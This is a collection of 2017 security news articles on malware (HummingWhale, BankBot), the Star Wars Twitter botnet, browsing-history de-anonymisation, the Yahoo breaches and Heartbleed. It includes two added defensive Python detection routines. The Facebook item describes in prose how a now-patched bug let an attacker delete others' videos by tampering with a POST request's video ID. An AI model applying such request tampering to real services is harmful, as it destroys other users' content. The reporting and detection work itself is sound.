“If I'm an adversary and I can find a single XSS on that domain, all I need to do at any point in the future is intercept an outgoing HTTP request from Chrome, insert a 302 redirect, and I have an instant RCE on who knows how many machines?” noted April King, information security engineer at Mozilla.

Others said they could still get Ormandy’s proof-of-concept (PoC) exploit to work even on the updated version.

As a result, both Google and Mozilla have decided to remove the WebEx extension from their stores until Cisco releases a proper fix.

“This is exactly the kind of ‘just visit this random website and now you have malware’ scenarios that we haven't seen in a while (on a large scale), and that we don't want to go back to,” said Filippo Valsorda, a researcher at CloudFlare.

Valsorda has published a blog post with advice on how to prevent these types of attacks in Chrome using browser profiles.

Researchers Link "de-identified" Browsing History to Social Media Accounts

24.1.2017 Securityweek Safety
Researchers Demonstrate How "de-identified" Web Browsing Histories Can be Linked to Social Media Accounts

While the use of cookies and other tracking mechanisms used to track computers is widespread and well understood, it is often believed that the data collected is effectively de-identified; that is, the cookies track the computer browser, not the person using the computer.

This is the message often promulgated by the advertising industry: tracking cookies allow targeted advertising without compromising personal privacy. Now new research from academics at Stanford and Princeton universities demonstrates that this need not be so.

In the new study 'De-anonymizing Web Browsing Data with Social Networks' (due to be presented at the 2017 World Wide Web Conference Perth, Australia, in April) the researchers show that de-identified web browsing histories can be linked to social media profiles using only publicly available data. Once the social media profile associated with a browsing pattern is known, the person is known.

The basic premise is that social media users are more likely to click on links posted by people they follow. This creates a distinctive pattern that persists in the browsing history. "An adversary can thus de-anonymize a given browsing history," states the report, "by finding the social media profile whose 'feed' shares the history's idiosyncratic characteristics."

The theory was tested against Twitter -- chosen because it is largely public, has an accessible API, and wraps its links in the t.co shortener. Assuming an 'adversary' has access to browsing histories, he can then easily deduce (through timing or referrer information) which links came from Twitter. The pattern of those referrals from Twitter can then be used to identify the user concerned by matching it with users' Twitter profile characteristics. The same approach could also be used against users with Facebook or Reddit accounts.

"Users may assume they are anonymous when they are browsing a news or a health website," says Arvind Narayanan, an assistant professor of computer science at Princeton and one of the authors of the research, "but our work adds to the list of ways in which tracking companies may be able to learn their identities."

The approach is not foolproof. Nevertheless, say the researchers, "given a history with 30 links originating from Twitter, we can deduce the corresponding Twitter profile more than 50 percent of the time." In fact, in a test involving 374 volunteers who submitted web browsing histories, the method was able to identify more than 70 percent of those users by comparing their web browsing data to hundreds of millions of public social media feeds.

"All the evidence we have seen piling up over the years showing the strong limits of data anonymization, including this study," comments Yves-Alexandre de Montjoye, an assistant professor at Imperial College London (not associated with the research), "really emphasizes the need to rethink our approach to privacy and data protection in the age of big data."

The problem goes beyond simple user privacy, since it could be used to target persons of interest. "The idea would be to look at something such as my Twitter account (as in who I'm following) and to determine what links I'm seeing," explains F-Secure security advisor Sean Sullivan. "And then, to find the 'User X' with the highest correlation between site visits and links seen. At which point, if I'm User X, I could be targeted by somebody who controls one of the sites visited."

At a purely 'commercial' level, this could be used to target individuals with high value goods. But it could also be used to find and target specific individuals prior to a network attack.

The researchers accept that their current methodology is not 100% accurate, but add that an "adversary may fruitfully make use of other fingerprinting information available through URLs, such as UTM codes. Thus, the main lesson of our paper is qualitative: we present multiple lines of evidence that browsing histories may be linked to social media profiles, even at a scale of hundreds of millions of potential users."

Furthermore, it claims, "our attack has no universal mitigation outside of disabling public access to social media sites, an act that would undermine the value of these sites." It calls for "more research into privacy-preserving data mining of browsing histories."

China Cracks Down on Bids to Bypass Online Censorship

24.1.2017 Securityweek Safety
Beijing - China has announced a 14-month campaign to "clean up" internet service providers and crack down on devices such as virtual private networks (VPNs) used to evade strict censorship.

The ruling Communist party oversees a vast apparatus designed to censor online content deemed politically sensitive, while blocking some Western websites and the services of internet giants including Facebook, Twitter and Google.

It passed a controversial cybersecurity bill last November, tightening restrictions on online freedom of speech and imposing new rules on service providers.

But companies and individuals often use VPNs to access the unfettered internet beyond China's "Great Firewall".

Telecom and internet service providers will no longer be allowed to set up or rent special lines such as VPNs without official approval, the ministry of industry and information technology said Sunday.

Its "clean up" campaign would last through March 2018, it said in a statement on its website.

The announcement comes days after President Xi Jinping extolled globalisation and denounced protectionism in a keynote speech at the World Economic Forum in Davos, where he insisted that China was committed to "opening up".

China's internet access services market has grown rapidly, and the "first signs of disorderly development are also appearing, creating an urgent need for regulation", the statement said.

The new rules were needed to "strengthen internet information security management", it added.

IT expert Li Yi told the Global Times newspaper, which often takes a nationalistic tone, the new regulations were "extremely important".

While some multinationals such as Microsoft needed VPNs to communicate with overseas headquarters, other companies and individuals "browse overseas internet pages out of illegal motivations", Li said.

A 2015 report by US think tank Freedom House found that China had the most restrictive Internet policies of 65 countries it studied, ranking below Iran and Syria.

China is home to the world's largest number of internet users, which totaled 731 million as of December, the government-linked China Internet Network Information Center said Sunday.

Millions Download HummingBad Variant via Google Play

24.1.2017 Securityweek Android
A newly discovered variant of the HummingBad Android malware has been downloaded millions of times after infecting 20 applications in Google Play, Check Point security researchers warn.

Discovered in early 2016, HummingBad has already proved to be one of the most prolific Android malware families, accounting for over 72% of attacks in the first half of that year.

In a report published last July, Check Point suggested that around 10 million Android devices might have been compromised by HummingBad and that its rootkit capabilities allowed attackers to take full control of the infected devices. The researchers also said that Yingmob, the group behind the malware, might have compromised over 85 million devices.

Dubbed HummingWhale, the newly discovered variant is said to include cutting edge techniques that allow it to perform its nefarious activities (ad fraud) better than before.

While HummingBad spread mainly through third-party app stores, the HummingWhale variant made its way into Google Play and infected 20 apps, all of which have already been removed by Google. The main giveaway, the researchers say, was a 1.3MB encrypted file called ‘assets/group.png’, also found in some later HummingBad samples that masqueraded as an app called “file-explorer.”

Offending apps were found to register several events on boot, such as TIME_TICK, SCREEN_OFF and INSTALL_REFERRER, as well as to feature a common name structure – com.XXXXXXX.camera (e.g. com.bird.sky.whale.camera, com.color.rainbow.camera, com.fishing.when.orangecamera). Apps outside of the camera family were also identified.
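An added triage routine (not Check Point's tooling) that scores a sample against the indicators listed above: the camera-family package name, the TIME_TICK/SCREEN_OFF/INSTALL_REFERRER registrations, and a roughly 1.3MB assets/group.png that lacks the PNG signature. It assumes the package name and the registered action names were extracted beforehand (for instance from the decoded manifest and code); the size tolerance is an assumption, and the two archives are constructed stand-ins for APKs.

```python
import io
import re
import zipfile

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
GROUP_PNG = "assets/group.png"
# Broadcast actions the offending apps registered for, as reported above
# (short names, as in the report).
SUSPICIOUS_ACTIONS = {"TIME_TICK", "SCREEN_OFF", "INSTALL_REFERRER"}
# The com.XXXXXXX.camera family, e.g. com.bird.sky.whale.camera and
# com.fishing.when.orangecamera.
CAMERA_FAMILY = re.compile(r"^com\.[a-z0-9.]+camera$")
# "1.3MB", with some slack on either side (assumption).
GROUP_PNG_SIZE = (1_000_000, 1_600_000)


def triage_apk(apk_bytes, package_name, registered_actions):
    """Return the names of the HummingWhale indicators a sample matches."""
    hits = []
    if CAMERA_FAMILY.match(package_name):
        hits.append("camera-family package name")
    if SUSPICIOUS_ACTIONS <= set(registered_actions):
        hits.append("registers TIME_TICK, SCREEN_OFF and INSTALL_REFERRER")
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as apk:
        if GROUP_PNG in apk.namelist():
            size = apk.getinfo(GROUP_PNG).file_size
            with apk.open(GROUP_PNG) as entry:
                head = entry.read(len(PNG_MAGIC))
            # A .png asset of the reported size whose bytes are not a PNG at
            # all is the "encrypted .apk inside a .png" pattern described above.
            if GROUP_PNG_SIZE[0] <= size <= GROUP_PNG_SIZE[1] and head != PNG_MAGIC:
                hits.append("~1.3MB non-PNG assets/group.png")
    return hits


def build_sample_apk(group_png):
    """Constructed stand-in for an APK: a zip with placeholder entries and,
    when given, an assets/group.png payload."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("AndroidManifest.xml", "<manifest/>")  # placeholder only
        z.writestr("classes.dex", b"dex\n035\x00")          # placeholder only
        if group_png is not None:
            z.writestr(GROUP_PNG, group_png)
    return buf.getvalue()


# Constructed samples: an opaque 1.3MB blob named .png versus a small PNG.
SUSPECT_APK = build_sample_apk(bytes(1_300_000))
BENIGN_APK = build_sample_apk(PNG_MAGIC + bytes(2_000))


def demo():
    """Triage both constructed samples; returns (suspect hits, benign hits)."""
    suspect = triage_apk(
        SUSPECT_APK, "com.bird.sky.whale.camera",
        {"BOOT_COMPLETED", "TIME_TICK", "SCREEN_OFF", "INSTALL_REFERRER"})
    benign = triage_apk(BENIGN_APK, "com.example.photos", {"SCREEN_OFF"})
    return suspect, benign


if __name__ == "__main__":
    for label, hits in zip(("suspect", "benign"), demo()):
        print(label, hits)
```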

The HummingWhale samples were also observed registering to certain events and packing some identical strings in their code and certificates when compared to the previous HummingBad variants. HummingWhale was also observed being promoted by several new HummingBad samples, Check Point says.

The new malware variant, researchers say, is heavily packed and has its main payload in the ‘group.png’ file, which is actually an .apk that operates as a dropper. This executable file can download additional apps, a functionality observed in previous versions of HummingBad as well. The new dropper, however, uses the DroidPlugin Android plugin to upload fraudulent apps on a virtual machine.

“First, the Command and Control server (C&C) provides fake ads and apps to the installed malware, which presents them to the user. Once the user tries to close the ad, the app, which was already downloaded by the malware, is uploaded to the virtual machine and run as if it is a real device. This action generates the fake referrer id, which the malware uses to generate revenues for the perpetrators,” the security researchers explain.

By using this method, the cybercriminals ensure that the malware installs apps without gaining elevated permissions first, and that the malicious activity is disguised, thus allowing the malware to infiltrate Google Play. What’s more, the embedded rootkit in the previous HummingBad variant is no longer needed, since the same results are achieved without it. On top of that, the malware can now install an infinite number of fraudulent apps without overloading the device.

“HummingWhale also conducted further malicious activities, like displaying illegitimate ads on a device, and hiding the original app after installation, a trait which was noticed by several users. As can be seen in the image below, HummingWhale also tries to raise its reputation in Google Play using fraudulent ratings and comments, similar to the Gooligan and CallJam malware before it,” the security researchers say.

Lavabit Email Service Returns with New Encryption Platform

24.1.2017 Securityweek Safety
Lavabit, the secure email service that shut down in 2013 after the NSA requested access to Edward Snowden's email account, is recommencing operations on a new secure end-to-end communications platform, Lavabit owner Ladar Levison announced on Friday.

In August 2013, the service was suspended after the NSA requested its Secure Sockets Layer (SSL) private keys in order to access its users' email accounts. The NSA was reportedly interested in Snowden’s account at the time, but Lavabit suggested that, with the SSL key in its hands, the US government would have been able to access any account.

Lavabit’s closing at the time prompted other online services to take a similar route, including Silent Circle, which shut down its Silent Mail service “to prevent spying,” and Groklaw, a technology news site focused on legal issues. Several months later, Silent Circle and Lavabit formed the Dark Mail Alliance, focused on offering the “next-generation of private and secure email.”

The relaunch of Lavabit’s email service, Levison says, is meant not only to continue sustaining online freedom, justice, and liberty, but also to address some of the main issues that email services face today. He also points out that the reopening builds on the Dark Internet Mail Environment (DIME), an open source secure end-to-end communications platform for asynchronous messaging across the Internet.

“Today, we start a new freedom journey and inaugurate the next-generation of email privacy and security,” Levison notes on the Lavabit website.

DIME was created with Kickstarter funding, which also helped Levison build Magma, an associated DIME-capable free and open source mail server. Released on Friday together with Magma, the end-to-end encrypted global standard was designed to offer multiple modes of security (Trustful, Cautious, and Paranoid), and to address security problems that have so far been neglected.

The platform was designed as an evolution of OpenPGP and S/MIME, which don’t provide automatic encryption and don’t protect metadata. DIME, on the other hand, encrypts all facets of an email transmission (body, metadata and transport layer), thus aiming to deliver the greatest protection possible without sacrificing functionality.

“DIME is the only automated, federated, encryption standard designed to work with different service providers while minimizing the leakage of metadata without a centralized authority. DIME is end-to-end secure, yet flexible enough to allow users to continue using their email without a Ph.D. in cryptology,” Levison says.

Users can rely on the server to handle all privacy issues, meaning they would have to “trust” the server (Trustful mode), can set it to only store and synchronize encrypted data, including encrypted copies of a user’s private keys and encrypted copies of messages (Cautious mode), or can place a minimum amount of trust in the server, denying it access to private keys (encrypted or decrypted), but losing functionality, as webmail access won’t be available (Paranoid mode).

The service is available for existing users to regain access to their accounts in “Trustful” mode and update their credentials to the new DIME standard, as well as for new users to pre-register for an account.

Lavabit also made the free, open source library, and the associated command line tools for creating and handling the new DIME standard available for everyone, and says that any domain admin can deploy Magma or implement their own encrypted DIME compatible server. Clients for Windows, Mac OS X/iOS, and Linux/Android are also expected to be released.

“Today, the democratic power we transfer to keep identities safe is our own. With your continued patronage, we will restore privacy and make end-to-end encryption an automatic, ubiquitous and open source reality,” Levison concluded.

In 2014, Snowden’s revelations about widespread online surveillance resulted in a push to encrypt email and keep messages out of government reach, and the move regained momentum last year, after Apple refused to help the FBI access the San Bernardino iPhone, arguing that it was in fact being asked for a backdoor to all iPhones.

'Star Wars' Botnet Has 350,000 Twitter Bots

24.1.2017 Securityweek BotNet
A newly discovered Twitter botnet has been lying dormant for over three years, although it includes more than 350,000 bot accounts, researchers at the University College London have discovered.

Discovered by Juan Echeverria and Shi Zhou, the botnet stands out because all of the bots forming it present several specific characteristics, including the fact that all of them tweeted quotes from Star Wars. In a recently published paper (PDF) called The `Star Wars' botnet with >350k Twitter bots, the researchers also explain that all of the bots used Twitter for Windows Phone to post the messages.

Focused mainly on discussing the manner in which Twitter botnets can be discovered, the paper reveals other characteristics of these bots as well: they all used fake locations within a specific set of geographical coordinates (in Europe and North America), none had more than 11 tweets, more than 10 followers or more than 31 friends, none retweeted or mentioned another user, and all of their IDs were confined to a narrow range.

The researchers also discovered that the bots’ tweets included only the Star Wars quotations, along with either hashtags that are usually associated with earning followers, or the hash symbol # inserted in front of a randomly chosen word. After manually identifying 3,244 such bots, the researchers used machine learning to automatically detect all of the bots featuring the above characteristics (thus part of the Star Wars botnet).

For that, they looked into the content of the tweets created by these bots and a data set of 9,000 real users, and came up with a set of 80,000 words, including 30,000 most frequent words tweeted by the bots, and 50,000 words tweeted by the real users. By creating word count vectors and training the classifier (a machine learning technique) with the vectors, the researchers achieved over 99% precision in the detection of the bots.
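An added example (not the authors' code) of the two-stage approach described above: the hard profile constraints the bots all share, followed by a classifier trained on word-count vectors of bot and real-user tweets. Multinomial naive Bayes is used here as one reasonable word-count classifier, since the paper as summarised does not name its choice; the training tweets, profiles and thresholds are constructed.

```python
import math
import re
from collections import Counter

# A token is a word, optionally carrying the "#" the bots prepend to a random word.
TOKEN = re.compile(r"#?[a-z']+")


def tokenize(text):
    return TOKEN.findall(text.lower())


def profile_fits_botnet(profile):
    """Hard constraints shared by every Star Wars bot, as listed above."""
    return (profile["source"] == "Twitter for Windows Phone"
            and profile["tweets"] <= 11
            and profile["followers"] <= 10
            and profile["friends"] <= 31
            and profile["retweets"] == 0
            and profile["mentions"] == 0)


class WordCountNB:
    """Multinomial naive Bayes over word-count vectors."""

    def __init__(self, alpha=1.0):
        self.alpha = alpha           # Laplace smoothing for unseen words
        self.word_counts = {}        # label -> Counter of words
        self.doc_counts = Counter()  # label -> number of training tweets
        self.vocab = set()

    def fit(self, labelled_tweets):
        for text, label in labelled_tweets:
            tokens = tokenize(text)
            self.doc_counts[label] += 1
            self.word_counts.setdefault(label, Counter()).update(tokens)
            self.vocab.update(tokens)
        return self

    def log_posterior(self, text, label):
        counts = self.word_counts[label]
        denom = sum(counts.values()) + self.alpha * len(self.vocab)
        lp = math.log(self.doc_counts[label] / sum(self.doc_counts.values()))
        for tok in tokenize(text):
            lp += math.log((counts[tok] + self.alpha) / denom)
        return lp

    def predict(self, text):
        return max(self.word_counts, key=lambda label: self.log_posterior(text, label))


# Constructed training tweets (a handful here; the study built its vocabulary
# from 30,000 bot words and 50,000 real-user words).
BOT_TWEETS = [
    "Do or do not. There is no #try",
    "I find your lack of faith #disturbing",
    "The Force will be with you, always #followback",
    "Never tell me the odds #teamfollowback",
    "Fear is the path to the dark side #fear",
    "It's a trap #trap",
    "I have a bad feeling about this #follow",
    "Help me Obi-Wan Kenobi, you're my only #hope",
]
HUMAN_TWEETS = [
    "stuck in traffic again, need coffee",
    "anyone watching the game tonight?",
    "new phone finally arrived, setting it up now",
    "happy birthday to my sister!",
    "long day at work, pizza and a movie",
    "can't believe it's raining again",
    "just finished my exams, so relieved",
    "weekend plans: hiking and sleeping",
]

MODEL = WordCountNB().fit([(t, "bot") for t in BOT_TWEETS]
                          + [(t, "human") for t in HUMAN_TWEETS])


def is_star_wars_bot(profile, tweet, model=MODEL):
    """Combine the hard profile constraints with the text classifier."""
    return profile_fits_botnet(profile) and model.predict(tweet) == "bot"


if __name__ == "__main__":
    bot_profile = {"source": "Twitter for Windows Phone", "tweets": 7,
                   "followers": 2, "friends": 20, "retweets": 0, "mentions": 0}
    print(is_star_wars_bot(bot_profile,
                           "The dark side of the Force is a pathway to many #abilities"))
```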

The method revealed a total of 356,957 bots that were created between June 20 and July 14, 2013, all of which started tweeting immediately after creation, for a total of 150,000 tweets per day. However, all bots went silent on July 14, 2013, and the creation of new bots also stopped that day, suggesting that they were controlled by a botmaster, the researchers say.

Discussing the manner in which the botnet remained undetected for so long, the paper notes that “the Star Wars bots were deliberately designed to keep a low profile.” The bots tweeted a few times, did nothing special, only tweeted random quotations from novels in order to use real human language, used normal profiles (some even had pictures), and included no URLs in their tweets (in addition to never replying to or mentioning users and to following only a small number of friends).

The paper notes that the botnet was discovered because tweets were location-tagged, and the used locations created an anomaly that only a human eye could see. While the discovery of the Star Wars bots was “real luck,” the researchers say that it inspired them to look for other similar botnets, and that an even larger one, with over 500,000 bots, was spotted.

“However, the process of discovering these botnets is unique. It is unlikely that we can repeat our luck, because future botnets could easily be programmed to avoid the design `mistakes' of the Star Wars bots. For example bots do not need to tag their locations at all, because most users do not; and bots can quote from all sorts of sources, including other series of books, magazines, web pages, or even social media postings,” the paper reads.

Although the Star Wars bots stayed inactive for more than three years, they shouldn’t be considered harmless, because the botmaster likely still has control over them, the researchers say. Thus, these bots can be easily used for spam, promotion of fake topics, opinion manipulation, astroturfing attacks, fake followers and sample contamination.

What’s more, because these bots are so old and managed to avoid detection for so long, they are believed to be more valuable to cybercriminals. Pre-aged bots are likely to be sold at premium rates on black markets, and “the Star Wars bots are perfectly suited to be sold,” the researchers say. In fact, because 15,000 Star Wars bots have been following a small number of Twitter users outside the botnet, it’s possible they were already sold as fake followers.

“One of the major challenges of research on Twitter bots is the lack of ground truth data,” the security researchers note, calling for new detection methods to find other hidden bots, as well as future bots that are likely to look more and more like normal users. “We argue that more research is needed to fully understand the potential security risks that a large, hidden botnet can pose to the Twitter environment, and research in general,” the researchers say.

Sale of Core Yahoo Assets to Verizon Delayed

24.1.2017 Securityweek IT
Yahoo Sale to Verizon Delayed

San Francisco - Yahoo said Monday its $4.8 billion deal to sell its core internet assets to US telecom titan Verizon has been delayed several months.

The closing originally set for this quarter has been pushed into next quarter due to "work required to meet closing conditions," the California online pioneer said in a statement, adding that it was "working expeditiously to close the transaction as soon as practicable."

The news came in an earnings release showing Yahoo swung to a profit of $162 million in the final three months of last year.

The deal with Verizon, which would end Yahoo's run of more than 20 years as an independent company, has been thrown into doubt following disclosures of two huge data breaches.

Yahoo said Monday it is hustling to ramp up security as it grapples with the aftermath of epic hacks.

"Our top priority continues to be enhancing security for our users," Yahoo chief executive Marissa Mayer said.

She added that "approximately 90 percent of our daily active users have already taken or do not need to take remedial action to protect their accounts, and we're aggressively continuing to drive this number up."

Yahoo boasted having more than a billion users monthly in 2016, with more than 650 million of those people connecting from mobile devices.

Hack aftershocks

The US Securities and Exchange Commission has opened an investigation into whether Yahoo should have informed investors sooner about two major data breaches, the Wall Street Journal reported Sunday, citing people familiar with the matter.

US law requires companies that fall victim to such hacks to disclose them as soon as they are deemed to affect stock prices.

Yahoo announced in September that hackers in 2014 stole personal data from more than 500 million of its user accounts. It admitted another cyber attack in December, this one dating from 2013, affecting over a billion users.

The SEC's investigation is focusing on why it took Yahoo several years to reveal the 2013 and 2014 attacks.

The data breaches have been a major embarrassment for a former internet star that has failed to keep up with Google, Facebook and other rising stars.

The cyber attacks, and the way user notification was handled, have also raised concerns among investors that Verizon may seek to pay a lower price for Yahoo or even back out of the deal.

The earnings report showed Yahoo swung to a profit, compared with a massive $4.4 billion loss in the same period a year earlier that resulted from a large writedown on the value of its holdings.

Revenue in the fourth quarter rose to $1.47 billion from $1.27 billion a year earlier.

Yahoo reported a loss of $214 million for the full year on revenue that inched up to $5.2 billion from $5 billion in 2015, according to the earnings report.

Mayer has been driving a shift to mobile, video, social, and native advertising offerings at Yahoo, and revenue in those areas, which she dubbed "Mavens," continued to climb.

Mavens revenue for last year slightly topped $2 billion as compared to $1.7 billion in 2015.

"I'm very pleased with our Q4 results and incredibly proud of the team's execution on our 2016 strategic plan, particularly given the uniquely eventful past year for Yahoo," Mayer said.

Source Code for BankBot Android Trojan Leaks Online

24.1.2017 Securityweek Android
The source code of Android banking Trojan BankBot, along with instructions on how to use it, recently emerged on a hacker forum, Doctor Web security researchers have discovered.

The source code was published about a month ago, but Android malware based on the code was spotted last week. Once the malware gets admin privileges on an infected device, it removes its shortcut from the homescreen to hide itself and hinder removal. Next, it connects to a command and control (C&C) server to retrieve instructions.

The BankBot Trojan is distributed masquerading as benign applications. On infected devices, it can request administrative privileges, display phishing pages to steal login credentials, intercept and send SMS messages, send USSD requests, retrieve the contacts list, track the device, make calls, and receive an executable file containing a list of banking apps to attack.

Malicious programs with such capabilities are usually sold as commercial products on underground forums. However, with the source code of this application leaked online, the number of attacks involving Android banking Trojans is likely to increase significantly soon, Dr.Web suggests.

The malware can track the launch of banking applications on the user’s device and overlay phishing dialogues to trick users into revealing their login information. The malware is targeting over three dozen such financial applications, including banking and payment system software.

The security researchers have discovered that the malware can also steal bank card information. For that, the Trojan tracks the launch of multiple popular applications on the device, including Facebook, Viber, Youtube, WhatsApp, Uber, Snapchat, WeChat, imo, Instagram, Twitter, and Play Store, to display a phishing dialog on top of them, tricking users into believing it is a Google Play purchase page.

“Information on found matches is sent to the C&C server. The Trojan receives a list of files to be monitored from execution. After one of them is launched, Android.BankBot.149.origin displays WebView on top of the attacked application with a fraudulent authentication form to access the user account. Then the entered information is sent to the server,” Dr.Web says.

BankBot was also designed to steal SMS messages. When an SMS arrives, the malware turns off sounds and vibrations and sends the content of the message to the cybercriminals, while also attempting to delete the original entry from the list of incoming SMS. This would result in users missing bank notifications about unplanned transactions that cybercriminals are performing.

Data stolen from the device, which includes information on the anti-virus applications installed on the infected device, is uploaded to the C&C server, making it accessible to the cybercriminals. What’s more, the security researchers say, an administration panel provides operators with control over the malicious app.

“In general, the possibilities of this Trojan are quite standard for modern Android bankers. However, as cybercriminals created it with publicly available information, one can anticipate that many Trojans similar to it will appear,” Doctor Web’s security researchers conclude.

“Dumping malware code is a great way to allow others to contribute to the code and modify it to help evade detection. This tactic was very successful for distributing Zeus. When you have a larger group modifying the code, the number of variants increases rapidly, making it very hard for security products that rely on pattern matching to detect it,” Lamar Bailey, Senior Director of Security R&D for Tripwire, told SecurityWeek in an emailed comment.

This Bug Could Allow Hackers to Delete Any Video On Facebook
23.1.2017 thehackernews
A security researcher has discovered a critical vulnerability in Facebook that could have allowed attackers to delete any video on the social networking site, shared by anyone, from their wall.
The flaw was discovered by security researcher Dan Melamed in June 2016; it allowed him not only to remotely delete any video on Facebook shared by anyone, without any permission or authentication, but also to disable commenting on any video of his choice.
Here's how to exploit this flaw:
In order to exploit this vulnerability, Melamed first created a public event on the Facebook page and uploaded a video on the Discussion part of the event.
While uploading the video, the researcher tampered with the POST request using Fiddler, replacing the Video ID value of his own video with the Video ID of any other video on the social media platform.
Although Facebook responded to this request with a server error ("This content is no longer available"), the new video was nevertheless posted successfully and displayed just fine.
Once this task was accomplished, Melamed deleted his event post, which eventually deleted the attached video.
And guess what? This in turn removed the video from the social networking site and from the wall of the victim.
"You will also notice in the drop down section that there is the option to "Turn off commenting." This allows you to disable commenting on the video of your choice," Melamed writes.
Video Demonstration


For more step by step details about the vulnerability and how it works, you can watch the proof-of-concept video demonstration above which shows the Facebook video deletion attack in action.
Melamed responsibly reported the vulnerability to the Facebook security team, which patched the vulnerability within two weeks at the beginning of this year.
Shortly after patching the flaw, the social media giant rewarded him with a $10,000 bug bounty for his efforts.
This is not the first time such a vulnerability, allowing attackers to delete any video on Facebook, has been disclosed. Bug bounty hunters continuously find and report such bugs to keep the social media platform safe and secure.

Heartbleed Still Affects 200,000 Devices: Shodan

23.1.2017 Securityweek Vulnerability
While the number of services affected by the OpenSSL flaw known as Heartbleed has decreased, the Shodan search engine has still found nearly 200,000 vulnerable devices.

Heartbleed, tracked as CVE-2014-0160, is a critical vulnerability that allows attackers to steal information protected by SSL/TLS encryption. Some researchers believe the flaw was used in an attack where hackers managed to steal 4.5 million healthcare records.

A search for vulnerable devices conducted by Shodan in November 2015 returned 238,000 results and the number dropped by roughly 1,000 by late March 2016. A new search carried out on Sunday showed that 199,594 services are still vulnerable to Heartbleed attacks.

Many of the affected devices are located in the United States (42,000), followed by South Korea (15,000), China (14,000), Germany (14,000), France (8,700), Russia (6,600), UK (6,500), India (5,800), Brazil (5,500) and Italy (4,800). HTTPS accounts for a large majority of impacted services.

Geographical distribution of devices affected by Heartbleed

South Korea occupied only the 8th place after previous scans, but it has now become the second most affected country, apparently due to devices operated by SK Broadband, Boranet and KT Corporation (formerly Korea Telecom).

The list of top affected organizations also includes Amazon, Verizon Wireless, German ISP Strato, OVH in France, German hosting firm 1&1 Internet, Comcast, and Taiwan-based HiNet.

Apache HTTP Server (httpd) is by far the most affected product, particularly versions 2.2.22 and 2.2.15, while the top operating system is Linux 3.x. Shodan also found that more than 70,000 of the affected services have expired SSL certificates.

Yahoo Faces SEC Probe into Breach Disclosures

23.1.2017 Securityweek IT
In November 2016 Yahoo announced that it was cooperating with federal, state and foreign agencies, including the US Securities and Exchange Commission (SEC), which were seeking information on the data breaches also announced during 2016. In December, the SEC issued requests for relevant documents from Yahoo, and Yahoo is now reported to be under investigation.

In September 2016 Yahoo announced that it had suffered a breach in 2014. It claimed that 'state-sponsored' attackers had stolen data from 500 million users. Two months later it disclosed that an earlier breach from August 2013 had led to the compromise of 1 billion user accounts. Yahoo has not said when it knew about these breaches.

Different agencies have different rules about the disclosure of data breaches. The SEC's own 2011 rules are considered to be vague, and have never been enforced. It investigated the Target breach, but concluded that its own rules were not broken. These require that incidents that could have a "material adverse effect on the business" should be disclosed, but they do not define what this would be. The sheer size of the two Yahoo breaches combined with the intended acquisition of the organization by Verizon could make this a new test case for the SEC rules.

Yahoo may consider that simply disclosing the breaches before the Verizon acquisition is completed (expected to be during Q1 2017) may be sufficient to comply with the SEC rules. The SEC's primary concern is to protect investors rather than users. Although it was thought that the breaches might cause Verizon to pull out of the acquisition, this is now thought to be unlikely. Yahoo can therefore argue that non-disclosure has not affected investors.

Verizon originally agreed to pay $4.8 billion for Yahoo, although the New York Post reported that it subsequently sought a $1 billion discount following the first disclosure. The report added, "At the same time, the Yahoo deal team is pushing back hard against any attempts to negotiate the price down, sources said."

The SEC is best known for its actions against fraud rather than data protection. In October 2016, it ordered one of the Big 4 global audit companies, Ernst & Young, to pay $11.8 million ($1 million fines and $10.8 million in audit fee give-backs plus interest) for missing a major accounting fraud at Weatherford International.

Other agencies are more concerned about the compromise of personal data. In Europe, current data protection laws are enforced by individual national authorities (such as the Information Commissioner in the UK). The Article 29 Working Group comprises representation from all of the national regulators. In October 2016 it wrote to Yahoo asking for breach details: "As Data Protection Authorities (DPAs) in charge of the protection of European individuals' data, we are deeply concerned by the report and the significant number of EU data subjects which may be affected."

Any subsequent action from European regulators would come from each individual country concerned. For example, the ICO fined TalkTalk $510,000 in October 2016. Such fines could, however, be dwarfed by those available under the upcoming General Data Protection Regulation. Here, the ICO warns, "A notifiable breach has to be reported to the relevant supervisory authority within 72 hours of the organization becoming aware of it... Failing to notify a breach when required to do so can result in a significant fine up to 10 million Euros or 2 per cent of your global turnover."

It seems almost certain that Yahoo did not make its breach notifications within 72 hours of discovery. The implication is that if the GDPR were already operational, Yahoo would have even more problems than it already has.

Over 199,500 Websites Are Still Vulnerable to Heartbleed OpenSSL Bug
23.1.2017 thehackernews

It's more than two and a half years since the discovery of the critical OpenSSL Heartbleed vulnerability, but the flaw is still alive, as it appears that many organizations did not properly remediate the serious security flaw.
It was one of the biggest flaws in the Internet's history, affecting the core security of as many as two-thirds of the world's servers, i.e. half a million servers, at the time of its discovery in April 2014.
However, the critical bug still affects more than 199,500 systems even after 2 years and 9 months have already passed, according to a new report published today on Shodan, a search engine that scans for vulnerable devices.
Over 199,500 Systems Still Vulnerable to Heartbleed
Heartbleed (CVE-2014-0160) was a serious bug in OpenSSL's implementation of the TLS/DTLS heartbeat extension that allowed attackers to read portions of the affected server's memory, potentially revealing user data that the server was not intended to reveal.
According to Shodan CEO John Matherly, about 199,500 services remain exploitable by the Heartbleed vulnerability due to unpatched OpenSSL instances.
The countries most affected by Heartbleed remain the United States, followed by Korea, China, Germany, France, the Russian Federation, the United Kingdom, India, Brazil and Italy.
Matherly discovered 42,032 heartbleed-exploitable services in the United States, 15,380 in Korea, 14,116 in China, and 14,072 services in Germany.
The top organizations with services vulnerable to the OpenSSL bug are SK Broadband and Amazon.com, and about 75,000 of the vulnerable services use expired SSL certificates and run Linux 3.x.
Heartbleed is one of many flaws that often remain unpatched in the wild, and now that the bug is more than two and a half years old and known to everybody, anyone can simply use it to carry out attacks against the still affected systems.
Around 200,000 is really a troubling number, and one can imagine the danger and damages caused by the bug if exploited.
Software bugs may come and go, but this flaw is more critical and probably the biggest Internet flaw in recent history as it left the contents of a server's memory, where the most sensitive data is stored, exposed to the attackers.
What are the Steps to Protect your Systems against Heartbleed?
It takes roughly three steps to remediate the Heartbleed bug.
Patching: Update your software to the latest version of OpenSSL; thankfully almost all organizations have accomplished this step.
Creation of New Private Keys: Creating new private keys will prevent an attacker who already exploited the flaw before patching from being able to spy on your encrypted traffic.
Reissuance of Security Certificates: This step will eliminate the ability of any attacker to spoof organizations and fool or phish their customers.
